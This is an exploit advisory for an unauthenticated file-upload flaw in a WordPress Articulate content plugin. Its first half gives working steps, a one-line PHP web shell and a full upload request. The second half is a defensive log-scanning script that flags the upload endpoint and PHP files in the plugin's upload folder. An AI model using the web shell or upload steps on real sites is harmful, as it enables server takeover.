WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unauthorized) - CXSecurity.com

Vulnerability ID: 1639755
Vulnerability type:
Published: 2019-06-23
Updated: 2019-06-23
CVE number: N/A
CNNVD-ID: N/A
Platform: N/A
CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2019060146
|Details
Vulnerability details have not yet been disclosed.
|Exploit
# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137
# Author : Con7ext

1. Create two files: index.php (or any other name) and index.html
Example: index.html
<html>
HELLO WORLD
</html>
Example: index.php
<?php system($_GET['cmd']); ?>
2. Compress them into a zip archive
3. Make a request to /wordpress/index.php/wp-json/articulate/v1/upload-data
POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1
Host: movie.boniw.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 808294
Connection: close

-----------------------------57052814523281
Content-Disposition: form-data; name="name"

whatever.zip
-----------------------------57052814523281
Content-Disposition: form-data; name="chunk"

2
-----------------------------57052814523281
Content-Disposition: form-data; name="chunks"

3
-----------------------------57052814523281
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

ANY

4. You will see a message like:
{"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"}
5. Then you can open site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php )
6. Then you can run commands ( just add ?cmd, e.g. site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )
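From the defender's side, the response in step 4 shows the two things worth alerting on: the unauthenticated upload endpoint (/wp-json/articulate/v1/upload-data) and the plugin extracting archives into wp-content/uploads/articulate_uploads, a directory that should never serve PHP. The following script is an added example written for this page, not part of the advisory or of the plugin; it walks web-server access-log lines in the common "combined" format and flags POSTs to the upload endpoint and any request for a PHP file under articulate_uploads (with a separate tag when a cmd query parameter is present, as in step 6). The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" log format. The request
# paths mirror the advisory (upload endpoint, then the dropped index.php fetched
# with ?cmd=); IPs are documentation ranges and the referer host is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jun/2019:10:00:01 +0000] "POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1" 200 245 "http://example.test/wordpress/wp-admin/post.php?post=16&action=edit" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2019:10:00:07 +0000] "GET /wp-content/uploads/articulate_uploads/kntl/index.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jun/2019:10:01:00 +0000] "GET /wp-content/uploads/articulate_uploads/course1/story.html HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jun/2019:10:01:02 +0000] "GET /wp-content/uploads/2019/06/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The plugin's REST upload route from the advisory (path suffix, so any
# WordPress install prefix such as /wordpress/index.php still matches).
UPLOAD_ENDPOINT_RE = re.compile(r'/wp-json/articulate/v1/upload-data$')

# A PHP-family file served from the plugin's extraction directory. Legitimate
# Articulate content is HTML/JS/media, so any .php here is suspicious on its own.
UPLOAD_DIR_PHP_RE = re.compile(
    r'^/wp-content/uploads/articulate_uploads/.+\.(?:php\d?|phtml)$', re.I
)


def classify(line):
    """Return a list of finding tags for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    findings = []
    if m.group('method') == 'POST' and UPLOAD_ENDPOINT_RE.search(parts.path):
        findings.append('articulate_upload_endpoint')
    if UPLOAD_DIR_PHP_RE.match(parts.path):
        findings.append('php_in_articulate_uploads')
        if 'cmd' in parse_qs(parts.query):
            findings.append('cmd_parameter')
    return findings


def scan(log_text):
    """Return (client_ip, request_target, findings) for every flagged line."""
    results = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            results.append((m.group('ip'), m.group('target'), tags))
    return results


if __name__ == '__main__':
    for ip, target, tags in scan(SAMPLE_LOG):
        print(ip, target, ', '.join(tags))
```

On the sample above the two 203.0.113.5 lines are flagged and the two 198.51.100.9 lines (an HTML course file and an ordinary upload) are not. The php_in_articulate_uploads tag is the durable signal: it does not depend on the attacker's choice of query-parameter name, and the same rule translates directly into a web-server or WAF deny rule for PHP execution under wp-content/uploads.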